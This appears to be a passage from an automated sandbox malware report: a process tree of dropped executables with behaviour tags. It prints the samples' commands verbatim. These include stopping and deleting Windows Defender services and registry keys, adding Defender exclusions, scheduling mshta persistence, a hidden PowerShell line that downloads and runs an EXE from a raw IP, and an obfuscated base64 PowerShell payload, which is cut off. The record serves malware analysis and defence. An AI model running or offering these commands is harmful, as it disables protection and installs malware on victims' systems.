        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5884 -prefsLen 32952 -prefMapHandle 5888 -prefMapSize 270279 -jsInitHandle 5892 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5900 -initialChannelId {85db639b-95bb-4d34-a8c0-f7f39b158c14} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:5836
      - C:\Users\Admin\AppData\Local\Temp\10478900101\b0c6ece98a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478900101\b0c6ece98a.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1172
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1279.tmp\127A.tmp\127B.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        8⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13E1.tmp\13E2.tmp\13E3.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        10⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4388
        
        C:\Windows\SysWOW64\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4408
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:864
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        11⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1204
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5476
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5456
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5420
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5260
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5372
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5344
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5312
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:5292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5248
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5668
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5468
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5704
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5720
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:5748
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5760
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5796
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5996
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5124
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:6044
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5220
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5184
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5632
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5556
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2064
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5536
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:6048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5492
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:2828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:6140
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5476
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:5176
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5448
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5428
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2872
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5364
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:3504
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5312
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5280
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5272
      - C:\Users\Admin\AppData\Local\Temp\10478910101\a0c10da70a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478910101\a0c10da70a.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5188
      - C:\Users\Admin\AppData\Local\Temp\10478920101\8236752b21.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478920101\8236752b21.exe"
        6⤵
        Executes dropped EXE
        
        PID:1956
      - C:\Users\Admin\AppData\Local\Temp\10478930101\0ff8e92974.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478930101\0ff8e92974.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 2O5fomaHQDM /tr "mshta C:\Users\Admin\AppData\Local\Temp\bDdw8WQ04.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5332
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 2O5fomaHQDM /tr "mshta C:\Users\Admin\AppData\Local\Temp\bDdw8WQ04.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:852
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\bDdw8WQ04.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
        
        "C:\Users\Admin\AppData\Local\TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4904
      - C:\Users\Admin\AppData\Local\Temp\10478940101\477a2709cb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478940101\477a2709cb.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2752
      - C:\Users\Admin\AppData\Local\Temp\10478950101\mtCxnCB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478950101\mtCxnCB.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5360
      - C:\Users\Admin\AppData\Local\Temp\10478960101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478960101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: MapViewOfSection
        
        PID:5764
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5364
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:1308
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:13472
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\{46e5c3c0-732f-462e-901a-c2f8cd738a09}\6fd55bf8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{46e5c3c0-732f-462e-901a-c2f8cd738a09}\6fd55bf8.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\{512f06ac-30e1-4608-83f7-83172afa0930}\91d827b1.exe
        
        C:/Users/Admin/AppData/Local/Temp/{512f06ac-30e1-4608-83f7-83172afa0930}/\91d827b1.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:7728
      - C:\Users\Admin\AppData\Local\Temp\10478970101\n0hEgR9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478970101\n0hEgR9.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5748
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5456
      - C:\Users\Admin\AppData\Local\Temp\10478980101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478980101\larBxd7.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:13784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:13880
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7660
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:7668
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5444
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        8⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        8⤵
        
        PID:6164
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        8⤵
        
        PID:6216
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6328
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6436
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478991121\5uMVCoG.cmd"
        6⤵
        
        PID:7528
      - C:\Users\Admin\AppData\Local\Temp\10479000101\8ca730f2af.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479000101\8ca730f2af.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6508
      - C:\Users\Admin\AppData\Local\Temp\10479010101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479010101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        
        PID:6740
      - C:\Users\Admin\AppData\Local\Temp\10479020101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479020101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7148
      - C:\Users\Admin\AppData\Local\Temp\10479030101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479030101\VrQSuEQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8172
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8188
      - C:\Users\Admin\AppData\Local\Temp\10479040101\RYZusWg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479040101\RYZusWg.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:9552
      - C:\Users\Admin\AppData\Local\Temp\10479050101\LJl8AAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479050101\LJl8AAr.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:12988
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:13056
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:13076
      - C:\Users\Admin\AppData\Local\Temp\10479060101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479060101\qhjMWht.exe"
        6⤵
        
        PID:7624
      - C:\Users\Admin\AppData\Local\Temp\10479070101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479070101\amnew.exe"
        6⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        
        PID:9160
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:9204
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
        8⤵
        
        PID:12480
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:12292
      - C:\Users\Admin\AppData\Local\Temp\10479080101\2e66d1557b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479080101\2e66d1557b.exe"
        6⤵
        
        PID:9472
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479080101\2e66d1557b.exe"
        7⤵
        
        PID:10060
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10479091121\ccosvAs.cmd"
        6⤵
        
        PID:12204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10479091121\ccosvAs.cmd"
        7⤵
        
        PID:12856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3